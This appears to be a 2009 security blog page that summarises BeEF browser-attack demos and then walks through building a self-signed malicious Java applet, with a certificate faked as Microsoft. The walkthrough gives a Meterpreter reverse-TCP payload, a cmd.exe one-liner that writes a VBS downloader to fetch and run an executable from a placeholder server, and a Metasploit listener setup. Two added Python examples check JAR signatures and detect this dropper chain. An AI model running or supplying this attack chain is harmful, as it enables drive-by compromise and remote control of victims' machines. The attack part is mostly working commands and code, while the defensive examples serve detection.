This is a module from the Browser Exploitation Framework (BeEF) to detect all of the plugins available within the browser. This was demonstrated during “Unmasking You!” at BlackHat 09 and DEFCON 17 by Joshua “Jabra” Abraham and Robert “RSnake” Hansen.
Disabling Safebrowsing
August 6, 2009
These are the steps used to disable SafeBrowsing within the Firefox browser. This can also be done using Edit->Preferences, selecting Security, then unchecking “Block reported attack sites” and “Block reported web forgeries”. This was demonstrated during “Unmasking You!” at BlackHat 09 and DEFCON 17 by Joshua “Jabra” Abraham and Robert “RSnake” Hansen.
Virtualization Detection
August 6, 2009
This is a module from the Browser Exploitation Framework (BeEF) to detect the virtualization technology being used by the client. This technique matches the MAC address against a regular expression to identify whether the client is running on VMware, QEMU, VirtualBox or Amazon EC2. This was demonstrated during “Unmasking You!” at BlackHat 09 and DEFCON 17 by Joshua “Jabra” Abraham and Robert “RSnake” Hansen.
SMBenum (Software Detection)
August 6, 2009
This is a module from the Browser Exploitation Framework (BeEF) to detect software on the client's machine. This technique uses local rendering of GIF images over SMB within the browser. This was demonstrated during “Unmasking You!” at BlackHat 09 and DEFCON 17 by Joshua “Jabra” Abraham and Robert “RSnake” Hansen.
Visited URLs (Alexa Top 500)
August 6, 2009
This is a module from the Browser Exploitation Framework (BeEF) to identify all of the URLs that the client has visited. This technique uses CSS history to identify valid results. This was demonstrated during “Unmasking You!” at BlackHat 09 and DEFCON 17 by Joshua “Jabra” Abraham and Robert “RSnake” Hansen.
Malicious Metasploit Applet (via BeEF)
August 6, 2009
This is a module from the Browser Exploitation Framework (BeEF) to load a malicious Java applet on the client. If the client runs the applet, a connection from the client’s system to the attacker’s system is made using the Metasploit Exploitation Framework. This was demonstrated during “Unmasking You!” at BlackHat 09 and DEFCON 17 by Joshua “Jabra” Abraham and Robert “RSnake” Hansen.
Metasploit Autopwn (via BeEF)
August 6, 2009
This is a module from the Browser Exploitation Framework (BeEF) to perform an iframe redirection to Metasploit Browser Autopwn or a browser exploit. However, in this video we used netcat (nc) instead of Metasploit: we configured netcat to listen and verified that the request was made to it. In exploitation, Metasploit would launch the exploit(s) against the client once the first request is made. This was demonstrated during “Unmasking You!” at BlackHat 09 and DEFCON 17 by Joshua “Jabra” Abraham and Robert “RSnake” Hansen.
Building a Java Applet with Meterpreter Payload
July 3, 2009
At Infosec World Conference, I gave a presentation on Breaking the Browser with Rafal Los. One of the demos that I prepared was a Java Applet with a Meterpreter Payload. The demo can be found here.
In this post, we will build an Applet that executes cmd.exe. Here is the source code of the Applet:
import java.applet.*;
import java.awt.*;
import java.io.*;

public class MSFcmd extends Applet {
    // init() runs as soon as the browser loads the applet; once signed, the applet
    // is allowed to spawn a process on the client.
    public void init() {
        String cmd = "cmd.exe";
        try {
            // Launch the command; the Process handle is not used further.
            Process f = Runtime.getRuntime().exec(cmd);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
Next, we need to self-sign the applet so that the browser will run it with the access it needs.
Compile the Applet source code to an executable class.
javac MSFcmd.java
Package the compiled class into a JAR file.
jar cvf MSFcmd.jar MSFcmd.class
Generate key pairs.
keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass
Sign the JAR file.
jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar SignedMSFcmd.jar MSFcmd.jar signapplet
Export the public key certificate.
keytool -export -keystore mykeystore -storepass mystorepass -alias signapplet -file mycertificate.cer
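As an added example that is not part of the original post (and not BeEF, Metasploit or JDK code), the following Python script shows what the jar/keytool/jarsigner steps above actually put inside the JAR, and gives a defender a quick way to triage a JAR found on a web root or in a proxy cache: is it signed at all (does META-INF hold a .SF file plus an .RSA/.DSA/.EC block), does the .SF still pin the manifest, and do the manifest digests still match every entry. It assumes the signer alias SIGNAPPLET and SHA-256 digests, builds its sample JAR in memory, and uses placeholder bytes for the .RSA block, so the CMS signature and the signer certificate (self-signed or otherwise) are not checked here; jarsigner -verify -certs does that part.

```python
import base64
import hashlib
import io
import zipfile
from typing import Dict, Optional

# Digest attribute names jarsigner writes into MANIFEST.MF and the .SF file, mapped to hashlib names.
DIGEST_ATTRS = {"SHA-256-Digest": "sha256", "SHA1-Digest": "sha1"}


def b64digest(algo: str, data: bytes) -> str:
    return base64.b64encode(hashlib.new(algo, data).digest()).decode("ascii")


def parse_manifest(text: str) -> Dict[str, Dict[str, str]]:
    """Parse MANIFEST.MF or a .SF file into {section: {attr: value}}; the main section is keyed ''."""
    # Lines over 72 bytes are folded onto a continuation line that starts with a single space.
    unfolded = text.replace("\r\n", "\n").replace("\n ", "")
    sections: Dict[str, Dict[str, str]] = {}
    name, current = "", {}
    for line in unfolded.split("\n") + [""]:        # trailing "" flushes the last section
        if not line.strip():
            if current:
                sections[name] = current
            name, current = "", {}
            continue
        key, _, value = line.partition(": ")
        if key == "Name":
            name = value
        else:
            current[key] = value
    return sections


def build_sample_jar(class_bytes: bytes, signed: bool = True,
                     digests_from: Optional[bytes] = None) -> bytes:
    """Constructed sample laid out like `jar cvf` + `jarsigner` output (assumed alias SIGNAPPLET).
    The .RSA block is placeholder bytes, not a real PKCS#7 signature. digests_from lets a caller
    build a JAR whose manifest digests were computed over other (original) class bytes."""
    manifest = ("Manifest-Version: 1.0\n\n"
                "Name: MSFcmd.class\n"
                f"SHA-256-Digest: {b64digest('sha256', digests_from or class_bytes)}\n\n").encode()
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", manifest)
        if signed:
            sf = ("Signature-Version: 1.0\n"
                  f"SHA-256-Digest-Manifest: {b64digest('sha256', manifest)}\n\n").encode()
            zf.writestr("META-INF/SIGNAPPLET.SF", sf)
            zf.writestr("META-INF/SIGNAPPLET.RSA", b"<placeholder, not a real CMS block>")
        zf.writestr("MSFcmd.class", class_bytes)
    return buf.getvalue()


def inspect_jar(jar_bytes: bytes) -> dict:
    """Report whether a JAR carries signature files and whether its digest chain still holds.
    Verifying the CMS signature in the .RSA/.DSA/.EC block itself is left to jarsigner -verify."""
    report = {"signed": False, "signature_files": [], "sf_ok": None,
              "manifest_ok": False, "bad_entries": [], "unsigned_entries": []}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = zf.namelist()
        meta = [n for n in names if n.upper().startswith("META-INF/")]
        sf_files = [n for n in meta if n.upper().endswith(".SF")]
        blocks = [n for n in meta if n.upper().endswith((".RSA", ".DSA", ".EC"))]
        report["signature_files"] = sorted(sf_files + blocks)
        report["signed"] = bool(sf_files) and bool(blocks)
        if "META-INF/MANIFEST.MF" not in names:
            return report                                # nothing to check against
        raw_manifest = zf.read("META-INF/MANIFEST.MF")
        manifest = parse_manifest(raw_manifest.decode("utf-8"))
        # Layer 1: each .SF pins a digest of the whole manifest (the .SF is what the CMS block signs).
        for sf in sf_files:
            main = parse_manifest(zf.read(sf).decode("utf-8")).get("", {})
            for attr, algo in DIGEST_ATTRS.items():
                pinned = main.get(attr + "-Manifest")
                if pinned is not None:
                    ok = pinned == b64digest(algo, raw_manifest)
                    report["sf_ok"] = ok if report["sf_ok"] is None else (report["sf_ok"] and ok)
        # Layer 2: the manifest pins a digest of every entry's bytes.
        for entry, attrs in manifest.items():
            if not entry:
                continue
            if entry not in names:                       # listed in the manifest but missing
                report["bad_entries"].append(entry)
                continue
            data = zf.read(entry)
            if any(attr in attrs and attrs[attr] != b64digest(algo, data)
                   for attr, algo in DIGEST_ATTRS.items()):
                report["bad_entries"].append(entry)
        # Entries the manifest never mentions are not covered by the signature at all.
        report["unsigned_entries"] = [n for n in names if n not in meta
                                      and not n.endswith("/") and n not in manifest]
        report["manifest_ok"] = not report["bad_entries"] and not report["unsigned_entries"]
    return report


if __name__ == "__main__":
    original = b"\xca\xfe\xba\xbe constructed stand-in for MSFcmd.class"
    print("clean    ", inspect_jar(build_sample_jar(original)))
    print("tampered ", inspect_jar(build_sample_jar(b"modified", digests_from=original)))
    print("unsigned ", inspect_jar(build_sample_jar(original, signed=False)))
```

Run as a script it prints the three reports. An inventory job over a web root would call inspect_jar on each file and escalate anything that is signed but fails manifest_ok, or that carries unsigned_entries, since both mean the JAR was altered after it was signed; an unsigned JAR is not a finding on its own, only a sign that the browser will not grant it elevated access.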
To make this easier for people to use, I built a simple bash script called makeapplet.sh.
Example of running makeapplet.sh:
./makeapplet.sh
Enter the name of the applet without the extension:
MSFcmd
[+] Packaging the compiled class into a JAR file
[+] Generating key pairs
What is your first and last name?
[Unknown]:
What is the name of your organizational unit?
[Unknown]: Microsoft
What is the name of your organization?
[Unknown]: Microsoft Organization
What is the name of your City or Locality?
[Unknown]: Redmond
What is the name of your State or Province?
[Unknown]: Seatle
What is the two-letter country code for this unit?
[Unknown]: US
Is CN=Unknown, OU=Microsoft, O=Microsoft Organization, L=Redmond, ST=Seatle, C=US correct?
[no]: yes
[+] Signing the JAR file
Warning:
The signer certificate will expire within six months.
[+] Exporting the public key certificate
Certificate stored in file
[+] Done
Finally, we just need to deploy the JAR and the class file.
cp SignedMSFcmd.jar /var/www/
cp MSFcmd.class /var/www/
echo '<applet code="MSFcmd.class" archive="SignedMSFcmd.jar" height="1" width="1"></applet>' > /var/www/index.html
sudo /etc/init.d/apache2 start
Browse to the web server from a Windows system; the applet will execute cmd.exe.
To have the applet provide us a Meterpreter reverse shell, we need to modify the command that is run. First we need to construct a malicious executable using Metasploit (replace x.x.x.x with the IP of your server):
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R | ./msfencode -t exe -o update.exe
cp update.exe /var/www/
sudo chmod 755 /var/www/update.exe
Now, we need to add a command into the Java Applet to download and execute the executable:
cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs & echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> C:\windows\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & echo Http.Open "GET", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C:\windows\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\apsou.vbs & echo shell.Run "C:\windows\update.exe" >> C:\windows\apsou.vbs & start C:\windows\apsou.vbs http://x.x.x.x/my.exe C:\windows\update.exe
(replace x.x.x.x with the IP of your server)
Reference: http://www.milw0rm.com/papers/262
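From the defender's side, here is an added Python example (not part of the original post, and not BeEF or Metasploit code) that turns the structure of the dropper one-liner above, and the applet's cmd.exe launch earlier in the post, into detection logic over process-creation events: a script file assembled from echo redirects, the WinHttp.WinHttpRequest and ADODB.Stream objects used to fetch and write a binary, a script started with a URL as its argument, artifacts dropped straight into the Windows directory, and a shell whose parent is the browser's Java plug-in. The sample events are constructed, and the plug-in parent image names (java.exe, javaw.exe, jp2launcher.exe) are an assumption to confirm against your own telemetry.

```python
import re
from dataclasses import dataclass
from typing import List


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon event 1 / EDR telemetry), constructed for this example."""
    image: str      # image name of the new process
    parent: str     # image name of its parent
    cmdline: str    # full command line


# Command-line indicators derived from the structure of the one-liner quoted in the post.
# Each regex is confined to one `&`-separated segment so it cannot match across commands.
INDICATORS = [
    # echo ... > / >> something.vbs : a script file being built out of echo statements
    ("echo-to-script-file",
     re.compile(r"\becho\b[^&|]*>>?\s*[^\s&]+\.(?:vbs|vbe|js|jse|wsf|bat|cmd)\b", re.I)),
    # COM objects the dropped script uses to fetch a binary and write it to disk
    ("download-com-object",
     re.compile(r"WinHttp\.WinHttpRequest|ADODB\.Stream", re.I)),
    # a script started (start/wscript/cscript) with a URL as its argument
    ("script-run-with-url-arg",
     re.compile(r"\b(?:start|wscript(?:\.exe)?|cscript(?:\.exe)?)\b[^&|]*\.(?:vbs|js|wsf)\s+https?://", re.I)),
    # script or binary placed directly into the Windows directory
    ("script-in-windows-dir",
     re.compile(r"[A-Z]:\\windows\\[^\s\\&]+\.(?:vbs|js|wsf|exe)\b", re.I)),
]

# Assumed parent image names for the browser Java plug-in; confirm against your own telemetry.
JAVA_PLUGIN_PARENTS = {"java.exe", "javaw.exe", "jp2launcher.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


def match_indicators(ev: ProcEvent) -> List[str]:
    """Return the names of every indicator the event triggers."""
    hits = [name for name, rx in INDICATORS if rx.search(ev.cmdline)]
    if ev.image.lower() in SHELLS and ev.parent.lower() in JAVA_PLUGIN_PARENTS:
        hits.append("shell-spawned-by-java-plugin")
    return hits


def is_suspicious(ev: ProcEvent, threshold: int = 2) -> bool:
    """Require two independent indicators so a lone `echo ... > fix.bat` does not page anyone."""
    return len(match_indicators(ev)) >= threshold


# Constructed sample events: the first two mirror the post's chain, the others are benign noise.
SAMPLE_EVENTS = [
    ProcEvent("cmd.exe", "java.exe",
              r'cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & '
              r'echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & '
              r'start C:\windows\apsou.vbs http://x.x.x.x/my.exe C:\windows\update.exe'),
    ProcEvent("wscript.exe", "cmd.exe",
              r'wscript.exe C:\windows\apsou.vbs http://x.x.x.x/my.exe C:\windows\update.exe'),
    ProcEvent("cmd.exe", "explorer.exe", r'cmd.exe /c echo hello > C:\Users\alice\notes.txt'),
    ProcEvent("cscript.exe", "explorer.exe", r'cscript.exe //nologo C:\scripts\inventory.vbs'),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        flag = "ALERT" if is_suspicious(ev) else "ok   "
        print(f"{flag} {ev.image:<12} parent={ev.parent:<13} {match_indicators(ev)}")
```

The threshold is the design choice worth arguing about: any one of these indicators shows up in legitimate administration, but the combination of echo-built script plus download object plus URL argument in a single command line has no normal explanation, and the parent-process indicator is what ties it back to a browser applet rather than a logged-on user.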
Set up Metasploit to listen for the connections:
sudo ./msfconsole
use exploit/multi/handler
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 443
save
exploit -j
…
[*] Exploit running as background job.
[*] Started reverse handler
[*] Starting the payload handler…
PWN dem V0hns!
Regards,
Jabra